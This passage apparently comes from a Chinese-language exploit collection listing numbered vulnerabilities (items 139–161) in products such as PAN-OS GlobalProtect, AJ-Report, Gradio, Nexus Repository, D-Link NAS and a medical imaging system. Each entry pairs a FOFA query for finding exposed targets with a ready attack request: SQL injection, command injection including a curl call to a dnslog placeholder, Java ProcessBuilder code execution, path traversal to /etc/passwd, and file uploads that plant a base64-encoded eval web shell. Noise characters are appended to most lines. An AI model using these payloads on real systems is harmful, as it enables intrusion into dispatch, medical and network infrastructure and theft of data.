* T h9 S* ^4 Z; YUpgrade-Insecure-Requests: 1
1 n% \1 X4 r+ M9 k M0 O4 g& h* Y" i6 }" }% E2 [6 a0 w
7 `! D! Y/ W/ [+ z139. 福建科立讯通信指挥调度平台editemedia.php sql注入
8 e5 M$ q5 i$ I* l1 |6 cCVE-2024-2622
0 Z: [" ], G0 y& \FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"- U$ }) [' I! b" B& }
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
& g/ s6 D" X( K0 i" oHost: x.x.x.x
3 t! l1 B; J$ z. m0 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* W+ D% U. A0 ]$ c: b2 S+ W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& M0 w7 [! K) g# y+ v' D3 B, e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 A0 Z; {& c# ~1 F, J' Y1 X
Accept-Encoding: gzip, deflate, br
" y& @ }. b, a* [( ?+ O; OConnection: close
! m. l) `1 |% m9 _1 \ T& aCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
- S6 s/ x5 E9 f' {6 ~" l9 lUpgrade-Insecure-Requests: 1
5 v' b. G h! v$ R s. Q d L0 R, e" |0 e
7 D1 _2 F% E& N1 u
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入/ Z/ ^: C0 ]5 U! |
CVE-2024-2566
; ]) |0 @2 u/ p; AFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"* n) f1 a4 P& e0 y. g6 k6 f
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1$ b$ o; |, Z9 W6 Q5 P
Host: x.x.x.x
& V( G4 i7 u, h3 Y3 n( ?' u. rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 L+ v% x( J5 ]" N7 m" Y( t x8 w$ k6 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! ~2 ?2 [% k2 o8 C; V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( }: j4 u0 ?1 k' G2 q" X
Accept-Encoding: gzip, deflate, br
I7 K) J2 W% ^2 l. aConnection: close
- {! Z/ ~# P% Y' s' F v* ] s5 @Cookie: authcode=h8g9 P( R% P( F: F, s7 S
Upgrade-Insecure-Requests: 1! }9 Q& i# Z8 m, m; q. T
o. l n+ x6 Z& \. P1 E4 q
0 a3 W# H" y: d# h2 ]141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
" w% k+ _5 m; V8 [% b! o9 fFOFA:body="指挥调度管理平台"$ X. M* O6 s5 c1 t" U# k6 Z0 V1 I
POST /app/ext/ajax_users.php HTTP/1.1
D7 M& y; u+ _" rHost: your-ip
$ o4 X" t; y8 VUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
# B- L1 U7 x" C0 F" s+ yContent-Type: application/x-www-form-urlencoded
/ f! b/ j% w0 M; K( f4 V/ ]2 D9 N3 m2 w1 z! K+ y. d
7 \! P# Z) D+ o( mdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -- o/ x) k: B/ O3 L* t2 i# ]) Z
0 _9 J* v& m5 x: ^4 ^) [, z
0 N; {; w) p- [7 S! P
142. CMSV6车辆监控平台系统中存在弱密码# k; R% o4 p. ~# x$ a. ]6 M) q
CVE-2024-29666( y+ k. M3 o4 E* {6 q: A1 ^+ c
FOFA:body="/808gps/"
# S* C8 X- }9 a! Iadmin/admin
" q3 I8 n/ Z& O. h# P: a143. Netis WF2780 v2.1.40144 远程命令执行+ @8 q& R6 t) Y' h, l, H) S: B, t
CVE-2024-25850: r" p8 O! P& h! L# I) L' V
FOFA:title='AP setup' && header='netis'
5 {: P' E3 i% HPAYLOAD$ A0 _ n% e; A5 W$ C
7 ?' W, o7 m2 v' P; ?144. D-Link nas_sharing.cgi 命令注入
( J# ~8 N- _) iFOFA:app="D_Link-DNS-ShareCenter"
, I1 [! E: M1 c. `' Dsystem参数用于传要执行的命令 T- B5 C. A5 a+ L6 W& ]$ t
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1! n" }/ @$ s: Z) G; Y
Host: x.x.x.x) V# e: F. M+ \. u2 B
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.06 u. _6 `( \; V$ ^& Z. Z0 |
Connection: close M0 Y5 E% _3 L# V% o# G: x( |5 I
Accept: */*
; j. ^8 P" W) g$ }: z4 j3 NAccept-Language: en
; [% `0 b1 U6 Z8 m' ~% M6 Q6 u# JAccept-Encoding: gzip
6 B; S, {7 y) | g2 s. u6 ]2 |1 Q S
& v4 Y* R2 O6 ?/ F8 C7 V2 |4 F) d& J0 X6 O# R; E8 }, J
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
7 @! i1 M# j: ~) TCVE-2024-3400
# E! Y3 X/ m, k8 Q; l0 MFOFA:icon_hash="-631559155"
; g% g& Z' T6 q. f8 y4 [GET /global-protect/login.esp HTTP/1.1
- e' q/ u' q8 q, J9 ^Host: 192.168.30.112:1005
2 R; ?5 @# u2 R% E$ LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
: ^: x& z' o3 A4 W9 D! {! FConnection: close% S% ~+ M- N0 M6 {
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`; V1 g+ l/ M( y# e
Accept-Encoding: gzip( S, Y2 |& M- O6 d/ M0 n% G' ^
* g+ v! p8 W' e j# ?
0 \% w+ {7 q6 |146. MajorDoMo thumb.php 未授权远程代码执行 E# ]2 H F; W
CNVD-2024-02175# N0 {6 b3 M1 E7 W, C! N
FOFA:app="MajordomoSL") `& u8 ?9 J; S9 ^$ S. M2 r: H4 [
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1# @- }' p! v( L, f- b( `* T' e; p
Host: x.x.x.x
2 q6 x" a4 p7 N- l: a0 S( W8 u! pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.847 m0 p& H' O( T( P. O( v1 j* R5 U G
Accept-Charset: utf-8
( a: Y% B$ f( Z7 ]) `9 JAccept-Encoding: gzip, deflate7 D9 y" T/ X; [5 |. \( e( `
Connection: close' {' D7 F: n5 A
" l8 V+ y I& ], k m
- |) @7 |4 X1 j$ B- G147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
+ _8 w5 L) p" m0 c- VCVE-2024-32399
1 j: n5 N3 j4 r2 `0 KFOFA:body="RaidenMAILD": G2 A: H, ~& ]5 c. ]. Y( a
GET /webeditor/../../../windows/win.ini HTTP/1.1* C3 D0 \ }" m
Host: 127.0.0.1:81
+ V( O# B" [' X/ K" RCache-Control: max-age=0
- B- F) [# \- V9 y0 F* _; gConnection: close1 b k3 k" z8 J- j" [9 S3 i' M
+ h' g/ o9 d. O. M8 W# S( o& I; C2 v# x$ l& P
148. CrushFTP 认证绕过模板注入
# z4 z6 K' ~! h/ H0 r! zCVE-2024-40400 N! B: E5 a/ S0 W) K6 ]
FOFA:body="CrushFTP"
0 P0 k/ C3 n( b R, R1 y& jPAYLOAD
5 r& {$ G9 o! i4 c- O) J# l& n) q+ W' N& c( G, {
149. AJ-Report开源数据大屏存在远程命令执行, O. _! ~* e7 F* ] C* f6 B
FOFA:title="AJ-Report"' H# _5 O+ _* Y: V; @( f4 ]0 L0 ]1 R
3 j, U( w" K5 t7 k s' L2 z, R% TPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
5 k; F6 N9 t5 }9 b1 Z. \) IHost: x.x.x.x8 g1 s: U1 W. a: u0 O6 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
# X5 O/ g+ J* PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ I& L3 Z' U! ?+ |' ]% H( G; U# rAccept-Encoding: gzip, deflate, br
1 O7 U& x4 B- R K( AAccept-Language: zh-CN,zh;q=0.91 `' C& \ P/ j. b. e/ t
Content-Type: application/json;charset=UTF-8
2 R& Z& W8 O1 y4 H1 T& |, |Connection: close$ M) Y" f2 O! W7 E; [& O @( Z2 O) B% j
( r" d+ w' }0 J/ b: n+ z
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}' C/ M5 o) F* l8 x8 @. m# q1 b1 \
, R6 F3 O6 Y' Y* ?% o150. AJ-Report 1.4.0 认证绕过与远程代码执行# z, G8 o+ \: {4 x- x1 A" O) X( T
FOFA:title="AJ-Report"5 X) T& q$ M( a2 f; D4 K0 b5 D" {
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
& C9 y1 @ F$ A) q- `( JHost: x.x.x.x
* h e+ Z4 b( i0 t2 K. \7 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" k$ U& r4 w8 J# B4 Z* J5 K+ D- Z& aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# o5 f6 J( T5 @8 M0 F- R' b& Z3 HAccept-Encoding: gzip, deflate, br
* S- i0 I; \+ q/ {Accept-Language: zh-CN,zh;q=0.9; x# { z. ?# q
Content-Type: application/json;charset=UTF-83 p& Q: ?& @6 F; G+ v0 F9 F" Y
Connection: close, g# K& k. x4 J3 S- C$ q
Content-Length: 339
. }, T) \! G" ^- v2 J: S6 o8 G& ^( `% {' [0 s- t$ G
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}: G+ I/ }$ b+ }! D0 [4 ~) H7 ~
# X. o9 P! N; G: d
( o% S+ o& _6 f5 V3 P/ N' s
151. AJ-Report 1.4.1 pageList sql注入) m! [8 l8 U: ]8 J
FOFA:title="AJ-Report"
# e1 {" L% Q2 B6 A gGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
5 B8 E9 A4 u% X- i8 A$ \$ s- bHost: x.x.x.x
i/ I+ g$ \+ |! u9 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) T' m4 [$ M& W( z4 |/ r
Connection: close
$ k7 @% Y0 ?/ u# pAccept-Encoding: gzip, Y5 h& W. l3 M( p0 S- ~9 U
4 Q! G6 h0 R3 x1 u U) N6 J' D" K! ^& E4 n$ C
152. Progress Kemp LoadMaster 远程命令执行7 |! p* V0 E( l3 L. S/ {
CVE-2024-12124 R8 Q5 _$ D1 O/ ]
LoadMaster <= 7.2.59.2 (GA)5 Q/ d# i7 u% b2 s$ Y
LoadMaster<=7.2.54.8 (LTSF)- J: q/ `; Z8 r$ W) J; f; @- \/ O% O
LoadMaster <= 7.2.48.10 (LTS)
2 q3 m1 o$ m) R2 X5 Q3 \) OFOFA:body="LoadMaster"
, X5 b0 B. a/ k' H# z8 F0 A( }. ]JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
, j3 K2 o6 [! ]( ^! w, vGET /access/set?param=enableapi&value=1 HTTP/1.1
0 p2 D/ V9 v1 f& |5 T# u: ^( b8 lHost: x.x.x.x. y7 x* m' Q0 [+ S2 i/ M5 z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.19 _2 t9 S8 {$ p; I
Connection: close8 M; G! r1 k: `7 f: q; ~4 e7 D B
Accept: */*
* {0 c$ A8 d6 n3 tAccept-Language: en, ~' ]) W# ~4 @/ c t9 a
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=. \0 j# {6 {& ~. o5 a
Accept-Encoding: gzip
6 z5 a% o1 y( d* M1 i" n
6 I( k, E6 A( p- c* k+ p$ x8 _) o( z# ]. i5 c2 u7 g' q( y
153. gradio任意文件读取& U& U6 X- `# E i: j
CVE-2024-1561FOFA:body="__gradio_mode__"3 G: p" s" b0 Q9 |
第一步,请求/config文件获取componets的id8 Q# {9 ~5 G+ x. j" g% |
http://x.x.x.x/config7 v* v; g A* m2 v4 R% U5 Z
8 h1 p& Z+ x8 u* A4 a1 |- _6 M" M) s7 {' f
第二步,将/etc/passwd的内容写入到一个临时文件
2 U; s8 m- ~+ ?: U+ J: w |POST /component_server HTTP/1.1
3 N9 v0 H* n/ |# HHost: x.x.x.x
. U) l- F) f: v' m/ y# Q' p, ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
2 f! d% b8 |+ y/ d d5 j. c2 R' oConnection: close# k, U2 {! R& C; v; U
Content-Length: 115
" H$ p( Q) j; ]2 W, XContent-Type: application/json7 J T9 g7 ?; Z8 f; u; C* G6 U
Accept-Encoding: gzip$ A: q L" Y- k& g
# {9 {5 U& ]0 a' o- J2 W6 p
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}$ F$ f: }/ Y% u" i
1 v) E% x* P) `5 A9 o* Q
' l$ W- Q' [# a4 Z第三步访问
: t g0 W, o5 o0 E& Shttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
5 o- d+ _; K! @' \5 n% u! t
$ n" i0 W% r8 l! A0 G
4 k6 h$ s3 h; A8 Q# g154. 天维尔消防救援作战调度平台 SQL注入
3 V+ Y" r7 ~/ T/ P8 rCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
3 J' {" c" y/ m$ X, J7 V3 uPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
, p1 R- i& B @) O3 ?" NHost: x.x.x.x
5 v# e4 {( ?! G8 G7 MContent-Length: 1069 \; x+ H3 D2 ~/ \
Cache-Control: max-age=0
# F; S# \8 p# D5 w( X' sUpgrade-Insecure-Requests: 1! A3 Z M2 k( w
Origin: http://x.x.x.x
* }) H, k, U% o3 r! ^9 ~8 o, HContent-Type: application/json' i/ {$ j# H6 f7 R# W. q' Z1 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36/ ?5 w7 }2 ?- K3 s2 x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! Q) N3 B9 `9 s# q0 A% e
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page ~' V7 d4 S7 J& `( M4 \0 i/ X6 F. i: p
Accept-Encoding: gzip, deflate# h8 C5 b: G% b* i
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7/ h% J! @0 [1 a6 u
Connection: close
+ n- [* g5 \* p1 n6 |3 c4 Z' ]7 r1 X* y# Y7 ]
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
6 Z- r& u+ c% [+ P' w' t2 _$ W( `3 f# R R8 D6 I( Q; J: x; k
9 J# P* V( o6 G% Y* O& n155. 六零导航页 file.php 任意文件上传8 d* g P% S1 b; O }
CVE-2024-34982# ]! s" _8 B% |4 Q2 N2 Q
FOFA:title=="上网导航 - LyLme Spage"
( r+ a7 Q: A8 ]1 |' B7 mPOST /include/file.php HTTP/1.1( `: n* U2 D2 a' k. \
Host: x.x.x.x
: v/ W1 N# n% tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.01 s$ c: w( j5 O& P
Connection: close& z7 k. D2 ~3 W& {
Content-Length: 232$ ~, m0 R, A1 [+ \9 y) \$ M, c& h
Accept: application/json, text/javascript, */*; q=0.01
5 H, M1 P' U- }8 kAccept-Encoding: gzip, deflate, br. q7 D, S, Y1 ]# W+ Z& s2 [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ L( A1 D- B: p' G( b. n
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
5 H' L+ c" s' w3 e8 }X-Requested-With: XMLHttpRequest* e+ N1 q' A z0 ?% `) s8 T
; V6 @$ G7 J1 w3 X-----------------------------qttl7vemrsold314zg0f6 k: _6 a0 C9 \& l
Content-Disposition: form-data; name="file"; filename="test.php"
, q6 L- A9 C( [1 c" QContent-Type: image/png4 z1 i2 b% w( L. c7 k
2 O& D- y I0 G! [$ I. D<?php phpinfo();unlink(__FILE__);?>
3 A5 p" _3 R6 F8 s. |-----------------------------qttl7vemrsold314zg0f--! K& a7 c$ M9 v/ s4 T# M
3 h; `7 a' u4 F+ g$ D0 \' y0 Y5 W! V0 Q- V
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php) e/ @: `1 k/ d9 {3 z4 s8 C7 C
/ p' L! Q% w1 e" t; G1 ^& s9 Z156. TBK DVR-4104/DVR-4216 操作系统命令注入
2 `7 b u. r$ \2 B2 V+ j9 ^8 eCVE-2024-3721
" \: z5 j, T e1 S6 b3 nFOFA:"Location: /login.rsp" C8 L1 |( L2 f! ]! B
·TBK DVR-4104! P1 F6 a- S5 o% `4 m4 Y
·TBK DVR-4216
6 D+ L( q, O0 N2 m3 ccurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
4 L6 A# c* \* h" W3 g' ~
p5 q1 ?6 k2 w, y5 A8 \. Y0 o7 U0 ?( i6 u/ e3 V
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
! ?7 d3 _# r: q4 j& Y2 ZHost: x.x.x.x
# _ w* N7 l7 k( ^1 XUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# w) j/ v. D/ e$ b1 r; e' oConnection: close* {) X+ c& Y @
Content-Length: 0
! d/ {* f; q1 y1 lCookie: uid=1) Z, `' ~' ^) q% w; G
Accept-Encoding: gzip. T2 u% ]/ S ?5 N
! V6 G8 j4 c( t" z5 o. p# J
+ w1 z# U8 i' e1 E1 {& X' m2 i, X
157. 美特CRM upload.jsp 任意文件上传
7 W7 t, v) a2 T, g9 t. ?) p% XCNVD-2023-06971* r. Z7 D- r* c, k& J3 M
FOFA:body="/common/scripts/basic.js"
' p9 C4 v& H4 Z6 t7 K2 E* ZPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.14 n' v' q9 L% t% \
Host: x.x.x.x
8 _/ r5 ~7 Q& ~: k: Z, j( KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.365 m: `1 L/ Q F( A+ Z
Content-Length: 7097 l3 T) x. i9 \# H7 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 q* s, l" E% B+ w& aAccept-Encoding: gzip, deflate7 `3 L0 t6 W7 E' ~- J) N, ~; }
Accept-Language: zh-CN,zh;q=0.90 ~7 ^. Z r1 ]
Cache-Control: max-age=0
& f# D2 |3 O; |0 [: R" c# uConnection: close3 q1 p! H# J7 _ ~( Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN' m! y# d9 S7 ~) ?" {$ S: b
Upgrade-Insecure-Requests: 1
) J9 ?9 L9 y* y# R8 \5 P. w: K9 {( x' I# N/ F
------WebKitFormBoundary1imovELzPsfzp5dN' ?! \6 x: d. e) X) R
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
6 i. E" Z7 f- \- n, Q1 M. `Content-Type: application/octet-stream
. f: a$ b D% Z
4 E! H5 I' }" ~/ w9 ]' enyhelxrutzwhrsvsrafb
% w7 @1 `" z! q------WebKitFormBoundary1imovELzPsfzp5dN. \! [- H" ?5 H3 x. @* G
Content-Disposition: form-data; name="key"
4 k: g% V- _+ \7 L" R
9 c$ Z: g* C1 u0 C7 F0 }null* v2 b1 i* i" g L3 ~7 Y5 N/ }
------WebKitFormBoundary1imovELzPsfzp5dN
: T$ X! x0 x/ P% a& {- L. m, | rContent-Disposition: form-data; name="form"/ ?3 j0 H. U+ O; L( L6 ?$ ?: `% b* Y
/ _9 G' t# f, ]
null. @' d% \" I. o+ ?
------WebKitFormBoundary1imovELzPsfzp5dN
: h4 J( u! k# sContent-Disposition: form-data; name="field"
" P# v- H" G& r: _
2 Y- X( g7 M7 v" c' u/ ~2 @null
, m/ s0 U" c: g5 B------WebKitFormBoundary1imovELzPsfzp5dN0 ], k, T2 Z+ |
Content-Disposition: form-data; name="filetitile"
5 I: N( O. A7 k0 {. c& t$ ]$ r* n
) [* M$ w2 ^2 { S `& _+ bnull3 l4 G1 E1 L$ [% R, u# F
------WebKitFormBoundary1imovELzPsfzp5dN
- e: N" a! k( U- i8 TContent-Disposition: form-data; name="filefolder"
% F; S) W* u) Z6 y. H! X5 r
5 v0 X. b/ A/ g1 snull
! L1 e7 B9 t0 M------WebKitFormBoundary1imovELzPsfzp5dN--
2 P, J- W% y7 w5 y' d* U, C5 ^7 G7 E, D3 ?
) W4 t/ P% i( C. N. G! |http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
% }! j/ N; A: [! A `0 ?/ b% T" V. X5 F$ I7 f! t: c$ B
158. Mura-CMS-processAsyncObject存在SQL注入
! c3 u+ E' s5 ^- `; dCVE-2024-32640* {# e2 F# n0 D" [5 k/ L' Y( X
FOFA:"Generator: Masa CMS"# ], l j; _' V A* p6 X# t& d W
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.12 o. ~! f" D3 h( y
Host: {{Hostname}}
5 A' ^& T* m+ Q5 _8 ~Content-Type: application/x-www-form-urlencoded# d; a& H, z: Z, Y' n
6 f& N. s" x. i& M+ L# H7 H) mobject=displayregion&contenthistid=x\'&previewid=1
9 `9 k( I& b$ d% T# Y* V- ] b4 B- a2 ]3 h
1 B, M2 I4 M7 Q4 C2 H- e- R0 J
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
) M+ }3 B: s% f3 O* k4 LFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
, x0 e1 [7 G$ g" c* f* A# DPOST /webservices/WebJobUpload.asmx HTTP/1.13 ~' }+ E; H+ t
Host: x.x.x.x
: k* V2 }" l8 d; @7 h+ `6 d/ ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
( k' m5 B: \9 l! G' `+ D. W. }( B$ k: mContent-Length: 1080
) ]' M. L5 d' ^4 JAccept-Encoding: gzip, deflate# `- e+ }+ \8 w1 Z& p- ?% d1 Q
Connection: close% A: y- P. s0 W* W
Content-Type: text/xml; charset=utf-88 M, x; o8 o) C* u8 @. Q/ Z- F
Soapaction: "http://rainier/jobUpload"
0 N3 @2 q" S+ e$ L$ t
2 I5 z9 k, I8 B/ a [4 C0 G1 S, R<?xml version="1.0" encoding="utf-8"?>' n# Y! B/ [* Y( T
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
2 A; I6 N G9 b" H0 x2 p<soap:Body>* w# E% N3 W0 l& a% h0 C0 R, z* q( i G* d
<jobUpload xmlns="http://rainier"># F4 k* b) k5 @% R
<vcode>1</vcode>8 x7 D+ h$ E# ^/ [/ w
<subFolder></subFolder> t/ a% K3 w( }" _% F
<fileName>abcrce.asmx</fileName>
; v$ P$ X% Y3 s" O1 w8 ~; T<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
; o3 o( A/ n J/ m4 [7 c$ _0 B</jobUpload>' z+ K/ }3 Q0 v* U6 D6 o! _9 H0 B
</soap:Body>1 W, o" M- @3 `9 O- f& I
</soap:Envelope>" A/ g( y3 w! p* s! U" }
$ q8 k0 y7 J1 V9 ]
: ?5 T9 \. F/ f# Z H. F. o5 o
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
9 b; k$ L' ]* e5 t8 J7 N1 q! I k8 V
% g! H' Z, T' u$ Y2 O* ~, C
% q# a/ V+ r) b. Q, y160. Sonatype Nexus Repository 3目录遍历与文件读取
; c& S" t1 q, PCVE-2024-4956+ G. h; o+ V2 k0 W3 u5 c
FOFA:title="Nexus Repository Manager"
$ i2 B S. L f% QGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Y% b1 f0 q7 E. i9 E% a
Host: x.x.x.x* ~7 y* G9 a& ^* l% V; H# K1 F1 T
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
- m$ \& X6 {. PConnection: close; J/ u0 D% {( v& l
Accept: */*
5 g& a# ?/ C, U/ K2 C/ nAccept-Language: en2 t8 E2 n* F3 c" \; I
Accept-Encoding: gzip
0 p, B" q. M+ x6 v6 Z# K- w2 B7 U8 P( D* z( v3 `
" S3 L: |6 X s0 m161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
! D6 G2 A( @" QFOFA:body="/KT_Css/qd_defaul.css": W1 c) |% Z1 j& e; g
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
8 b/ i; F0 }: K( j: R% |POST /Webservice.asmx HTTP/1.1
' a8 ~: P' P' [4 t+ k6 SHost: x.x.x.x0 t- }+ v D8 l, g- A0 S, J4 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
+ w }2 u3 G% c$ d+ N0 tConnection: close
! A. r M X ]; c `Content-Length: 445
" o8 H6 P) v/ KContent-Type: text/xml5 ?3 J. n, F2 c7 a
Accept-Encoding: gzip
